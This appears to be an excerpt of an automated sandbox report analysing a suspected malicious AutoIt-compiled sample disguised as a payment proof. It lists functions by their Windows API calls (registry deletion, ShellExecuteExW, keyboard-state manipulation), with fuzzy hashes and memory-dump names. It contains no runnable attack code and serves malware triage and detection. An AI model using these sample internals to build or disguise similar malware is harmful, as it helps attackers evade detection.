LoadStringW.USER32(00000000), ref: 00FF6B87
_wprintf.LIBCMT ref: 00FF6BAD
MessageBoxW.USER32(00000000,?,?,00011010), ref: 00FF6BCB

Strings

%s (%d) : ==> %s: %s %s, xrefs: 00FF6BA8

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wprintf
String ID: %s (%d) : ==> %s: %s %s
API String ID: 3648134473-3128320259
Opcode ID: a656131b5f95b5ef05a5be2b5f5b24552acb4bf1748a22aad1b1f94f81350753
Instruction ID: d1a0c4cb0a539a4f1b7d4f539d0114e2a319b0fde427d494870aae51fbca814a
Opcode Fuzzy Hash: a656131b5f95b5ef05a5be2b5f5b24552acb4bf1748a22aad1b1f94f81350753
Instruction Fuzzy Hash: 590186F6900218BFE711A7D0DD89EF7336CEB08304F404491B785D6045EA789E844F70

Function 01012B19 Relevance: 12.3, APIs: 8, Instructions: 251registryCOMMON

Download Yara Rule

APIs

Part of subcall function 01013C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,01012BB5,?,?), ref: 01013C1D

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 01012BF6

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: BuffCharConnectRegistryUpper
String ID:
API String ID: 2595220575-0
Opcode ID: 775048ef969bee5cb4c45d4146a2d0b7b75804a5a542be3d2d77eb80bd67e899
Instruction ID: ba84f232084a5a23cb8505259e7c2161cd0cecc95f151fff2c68cd7a790ee13c
Opcode Fuzzy Hash: 775048ef969bee5cb4c45d4146a2d0b7b75804a5a542be3d2d77eb80bd67e899
Instruction Fuzzy Hash: 61918A712042059FCB10EF59C881BAEBBE5FF88310F54885DFA969B291DB39E905DF42

Function 00FDA979 Relevance: 12.1, APIs: 8, Instructions: 118COMMONLIBRARYCODE

Download Yara Rule

APIs

__mtinitlocknum.LIBCMT ref: 00FDA991

Part of subcall function 00FD7D7C: __FF_MSGBANNER.LIBCMT ref: 00FD7D91
Part of subcall function 00FD7D7C: __NMSG_WRITE.LIBCMT ref: 00FD7D98
Part of subcall function 00FD7D7C: __malloc_crt.LIBCMT ref: 00FD7DB8

__lock.LIBCMT ref: 00FDA9A4
__lock.LIBCMT ref: 00FDA9F0
InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,01066DE0,00000018,00FE5E7B,?,00000000,00000109), ref: 00FDAA0C
EnterCriticalSection.KERNEL32(8000000C,01066DE0,00000018,00FE5E7B,?,00000000,00000109), ref: 00FDAA29
LeaveCriticalSection.KERNEL32(8000000C), ref: 00FDAA39

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
String ID:
API String ID: 1422805418-0
Opcode ID: 82bf2e0dc9496a51e8178f544f1769b819053f366a0aad3000b7f4116e45eff9
Instruction ID: 3f45551c6b0178d1b0c3ea81c92c9ceae0ba1aba471f5fe13a2e7aab2f6e1d0d
Opcode Fuzzy Hash: 82bf2e0dc9496a51e8178f544f1769b819053f366a0aad3000b7f4116e45eff9
Instruction Fuzzy Hash: C2411472D00605DBEB209FA8DA4475DB7B2AF01334F18831AF465AB3C1D77D9941EB8A

Function 01018ECC Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 01018EE4
GetDC.USER32(00000000), ref: 01018EEC
GetDeviceCaps.GDI32(00000000,0000005A), ref: 01018EF7
ReleaseDC.USER32(00000000,00000000), ref: 01018F03
CreateFontW.GDI32(?,00000000,00000000,00000000,00000000,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 01018F3F
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 01018F50
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0101BD19,?,?,000000FF,00000000,?,000000FF,?), ref: 01018F8A
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 01018FAA

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: 608f07535c0ba64b396f9003b9c1ff17ac048ce84b29811f0202e2440e082c11
Instruction ID: 6adde81a7e814c70a566d25f566004266a4a39fe996c32becf79f089d8f2c1c2
Opcode Fuzzy Hash: 608f07535c0ba64b396f9003b9c1ff17ac048ce84b29811f0202e2440e082c11
Instruction Fuzzy Hash: 06317F72100614BFEB218F94CC49FEA3FAEEF49755F044065FF489A185C67A9841CB70

Function 010016DA Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 309COMMON

Download Yara Rule

APIs

Part of subcall function 00FB936C: __swprintf.LIBCMT ref: 00FB93AB
Part of subcall function 00FB936C: __itow.LIBCMT ref: 00FB93DF

Part of subcall function 00FCC6F4: _wcscpy.LIBCMT ref: 00FCC717

_wcstok.LIBCMT ref: 0100184E
_wcscpy.LIBCMT ref: 010018DD
_memset.LIBCMT ref: 01001910

Strings

X, xrefs: 01001948

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: _wcscpy$__itow__swprintf_memset_wcstok
String ID: X
API String ID: 774024439-3081909835
Opcode ID: 9ee580a1b3d5a5eaeefd494fa8590821e90d607c517d96af7f7e69da64c463cf
Instruction ID: b84373d979e75ae4adaffbc5d1b160814106e812c1c6a513a2ea3893c8450fd6
Opcode Fuzzy Hash: 9ee580a1b3d5a5eaeefd494fa8590821e90d607c517d96af7f7e69da64c463cf
Instruction Fuzzy Hash: 15C1A0306083409FD765EF28CD81A9EB7E4BF85350F04496DF9999B2A2DB34E944DF82

Function 01020133 Relevance: 10.7, APIs: 7, Instructions: 245windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00FCB34E: GetWindowLongW.USER32(?,000000EB), ref: 00FCB35F

GetSystemMetrics.USER32(0000000F), ref: 0102016D
MoveWindow.USER32(00000003,?,00000000,00000001,00000000,00000000,?,?,?), ref: 0102038D
SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 010203AB
InvalidateRect.USER32(?,00000000,00000001,?), ref: 010203D6
SendMessageW.USER32(00000003,00000469,?,00000000), ref: 010203FF
ShowWindow.USER32(00000003,00000000), ref: 01020421
DefDlgProcW.USER32(?,00000005,?,?), ref: 01020440

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: Window$MessageSend$InvalidateLongMetricsMoveProcRectShowSystem
String ID:
API String ID: 3356174886-0
Opcode ID: 7f8b0b58fe29fa5f9fd6f1d48c0b2f68c4920c5e5f27e3fbeb6672688cb32071
Instruction ID: 2d951d40d8bdab43182bd2924c3a755eaa651616d17749078b263954e3a05a8f
Opcode Fuzzy Hash: 7f8b0b58fe29fa5f9fd6f1d48c0b2f68c4920c5e5f27e3fbeb6672688cb32071
Instruction Fuzzy Hash: E0A1AC35600726EFDB18CF68C9857AEBBB5BF48704F04C155FD94AB288DB34A960CB90

Function 00FCAE78 Relevance: 10.7, APIs: 7, Instructions: 218COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0babb396e15edd27ac637b2e52ba1a1407e0ba0a827a7481f9b35b06a48014f0
Instruction ID: 22a9510c77f310d092d91dd267f488ea5c540dbe0ea70c712eb6147f49f6f7e1
Opcode Fuzzy Hash: 0babb396e15edd27ac637b2e52ba1a1407e0ba0a827a7481f9b35b06a48014f0
Instruction Fuzzy Hash: 01716BB190010AEFDB14CF98CD8AFAEBB78FF85314F14814DF955AA251C734AA11DBA1

Function 01012230 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 191COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0101225A
_memset.LIBCMT ref: 01012323
ShellExecuteExW.SHELL32(?), ref: 01012368

Part of subcall function 00FB936C: __swprintf.LIBCMT ref: 00FB93AB
Part of subcall function 00FB936C: __itow.LIBCMT ref: 00FB93DF

Part of subcall function 00FCC6F4: _wcscpy.LIBCMT ref: 00FCC717

CloseHandle.KERNEL32(00000000), ref: 0101242F
FreeLibrary.KERNEL32(00000000), ref: 0101243E

Strings

@, xrefs: 01012334

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: _memset$CloseExecuteFreeHandleLibraryShell__itow__swprintf_wcscpy
String ID: @
API String ID: 4082843840-2766056989
Opcode ID: 3b7e1928510ff1cf161694c35f5f7191bf69409b234772bca741068b1cac2095
Instruction ID: 5dce8a2a7d6d2c60758b5eb5e8fb9f3b15e4e9666a30d14afd18d7e3af60c8e3
Opcode Fuzzy Hash: 3b7e1928510ff1cf161694c35f5f7191bf69409b234772bca741068b1cac2095
Instruction Fuzzy Hash: 12719F74A006199FCF05EFA8C981A9EBBF5FF48310F148459E999AB351CB38AD40DF94

Function 00FF3DA8 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 00FF3DE7
GetKeyboardState.USER32(?), ref: 00FF3DFC
SetKeyboardState.USER32(?), ref: 00FF3E5D
PostMessageW.USER32(?,00000101,00000010,?), ref: 00FF3E8B
PostMessageW.USER32(?,00000101,00000011,?), ref: 00FF3EAA
PostMessageW.USER32(?,00000101,00000012,?), ref: 00FF3EF0
PostMessageW.USER32(?,00000101,0000005B,?), ref: 00FF3F13

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: e65f07102b34da06c476f0d2e88fefb3b9ab063cf5b740897d27218f5f7a4658
Instruction ID: 22bfad167205634739cfc6b9df20b95b9acd52ff281ae2d466df36ed9372bb7e
Opcode Fuzzy Hash: e65f07102b34da06c476f0d2e88fefb3b9ab063cf5b740897d27218f5f7a4658
Instruction Fuzzy Hash: 8451D3A0E047D93DFB364224CC45BBA7EA95F06314F084589E2D5468E2D3A9AEC8F760

Function 00FF3BC3 Relevance: 10.7, APIs: 7, Instructions: 164windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 00FF3C02
GetKeyboardState.USER32(?), ref: 00FF3C17
SetKeyboardState.USER32(?), ref: 00FF3C78
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00FF3CA4
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00FF3CC1
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00FF3D05
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00FF3D26

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: a8c692e4c0c273ec1a45280fe4fc26bcb0501f3a6ccb7f517f75fecda0550af6
Instruction ID: 18b417faeab8985835ca3b86b405e2b9e95533256b0594dd5b6928c51d403307
Opcode Fuzzy Hash: a8c692e4c0c273ec1a45280fe4fc26bcb0501f3a6ccb7f517f75fecda0550af6
Instruction Fuzzy Hash: 125126A09047DD3DFB3683748C55BBABF996F46310F088488E2D5564E2D295EE84F760

Function 00FF7DB1 Relevance: 10.6, APIs: 7, Instructions: 137timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 00FF7DBE
_wcsncpy.LIBCMT ref: 00FF7DF3
_wcsncpy.LIBCMT ref: 00FF7E25
_wcsncpy.LIBCMT ref: 00FF7E58
_wcsncpy.LIBCMT ref: 00FF7E9A
_wcsncpy.LIBCMT ref: 00FF7ED4
_wcsncpy.LIBCMT ref: 00FF7F03

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: _wcsncpy$LocalTime
String ID:
API String ID: 2945705084-0
Opcode ID: 2a8f7b9ecc5c31db05e672af87cb3b4f1a20a1d5c47dbaf9c5259b49779b521a
Instruction ID: cb6c55af8f50d5c5190cd63e69d1f7e1faa7615dba45332eda191872c7744af0
Opcode Fuzzy Hash: 2a8f7b9ecc5c31db05e672af87cb3b4f1a20a1d5c47dbaf9c5259b49779b521a
Instruction Fuzzy Hash: 59416F66D10218B6CB10EBF48C46ADFB3ADAF14320F588967E504E3261FA78E614D3E5

Function 01013D72 Relevance: 10.6, APIs: 7, Instructions: 100registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?), ref: 01013DA1
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 01013DCB
FreeLibrary.KERNEL32(00000000), ref: 01013E80

Part of subcall function 01013D72: RegCloseKey.ADVAPI32(?), ref: 01013DE8
Part of subcall function 01013D72: FreeLibrary.KERNEL32(?), ref: 01013E3A
Part of subcall function 01013D72: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 01013E5D

RegDeleteKeyW.ADVAPI32(?,?), ref: 01013E25

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: EnumFreeLibrary$CloseDeleteOpen
String ID:
API String ID: 395352322-0
Opcode ID: cda025e2ae80a531a1672a68ed79667c09f39323550cc8f43aa30cc64d182700
Instruction ID: 76fa24d55b5c9681e4316172ce429de9bfdb0a8e05fd118ff6c652fd7de20de2
Opcode Fuzzy Hash: cda025e2ae80a531a1672a68ed79667c09f39323550cc8f43aa30cc64d182700
Instruction Fuzzy Hash: 1E313071901209BFDB159FD4D885AFFB7FCFF08350F4001A9E552E6184D6789A449BA0

Function 01018FC8 Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 01018FE7
GetWindowLongW.USER32(009EE138,000000F0), ref: 0101901A
GetWindowLongW.USER32(009EE138,000000F0), ref: 0101904F
SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 01019081
SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 010190AB
GetWindowLongW.USER32(00000000,000000F0), ref: 010190BC
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 010190D6

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: c9cd8f2530beb6b73ba7dd0ae32d64fca196459574722f0b1e935c095e2edefe
Instruction ID: 55e26772e9ed973d8f4b9412f929b2609ac30473d83b2f8a0840b400b558bf0b
Opcode Fuzzy Hash: c9cd8f2530beb6b73ba7dd0ae32d64fca196459574722f0b1e935c095e2edefe
Instruction Fuzzy Hash: E2315C34A00115DFDB32CF98D894F5437E5FB49718F1441A8F6959F2AACB7AA850DF40

Function 00FF08AF Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00FF08F2
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00FF0918
SysAllocString.OLEAUT32(00000000), ref: 00FF091B
SysAllocString.OLEAUT32(?), ref: 00FF0939
SysFreeString.OLEAUT32(?), ref: 00FF0942
StringFromGUID2.OLE32(?,?,00000028), ref: 00FF0967
SysAllocString.OLEAUT32(?), ref: 00FF0975

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: db3061a9304cd89f2dafca92a2e441dda6a10b3fdfe56f925c40ac9f76de2155
Instruction ID: 5fe2f8a672506b50d173315fd66f85dc26ecfe298b88b436f7b45234f75c028b
Opcode Fuzzy Hash: db3061a9304cd89f2dafca92a2e441dda6a10b3fdfe56f925c40ac9f76de2155
Instruction Fuzzy Hash: 3421A8766012096F9B209FA8CC84DBB73ACEF09370B408525FA45DB256EAB4EC45D750

Function 00FF2472 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 00FF2485
__wcsnicmp.LIBCMT ref: 00FF24A6
__wcsnicmp.LIBCMT ref: 00FF24C0

Strings

#requireadmin, xrefs: 00FF24A0
#OnAutoItStartRegister, xrefs: 00FF24BA
#notrayicon, xrefs: 00FF247D

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
API String ID: 1038674560-2734436370
Opcode ID: a9731e9e0545e2d7084fb32dc263af254c37d4eb11e579c02d4dacd70394d3a4
Instruction ID: 23856ce1422db44e9bf30cdc6723a99df1fab0331af2843b70944e2d0528f795
Opcode Fuzzy Hash: a9731e9e0545e2d7084fb32dc263af254c37d4eb11e579c02d4dacd70394d3a4
Instruction Fuzzy Hash: 58219E7260411977D321EA748C12FBB7399EF64320F1C402AF64597152E7999941F3E5

Function 00FF0986 Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00FF09CB
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00FF09F1
SysAllocString.OLEAUT32(00000000), ref: 00FF09F4
SysAllocString.OLEAUT32 ref: 00FF0A15
SysFreeString.OLEAUT32 ref: 00FF0A1E
StringFromGUID2.OLE32(?,?,00000028), ref: 00FF0A38
SysAllocString.OLEAUT32(?), ref: 00FF0A46

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 883674fe73a91281a2c38901dd7488d7d597da580c56e92a048163c9dc17b173
Instruction ID: 040114f7e4ca6e2026e838bce4b338521d1d741c51655fe6c4cb822998e6d9b8
Opcode Fuzzy Hash: 883674fe73a91281a2c38901dd7488d7d597da580c56e92a048163c9dc17b173
Instruction Fuzzy Hash: 96217779600208AFDB10DFE8DC89DBAB7ECEF083607408125FA49CB265EA78EC459754

Function 0101A2C8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00FCD17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00FCD1BA
Part of subcall function 00FCD17C: GetStockObject.GDI32(00000011), ref: 00FCD1CE
Part of subcall function 00FCD17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 00FCD1D8

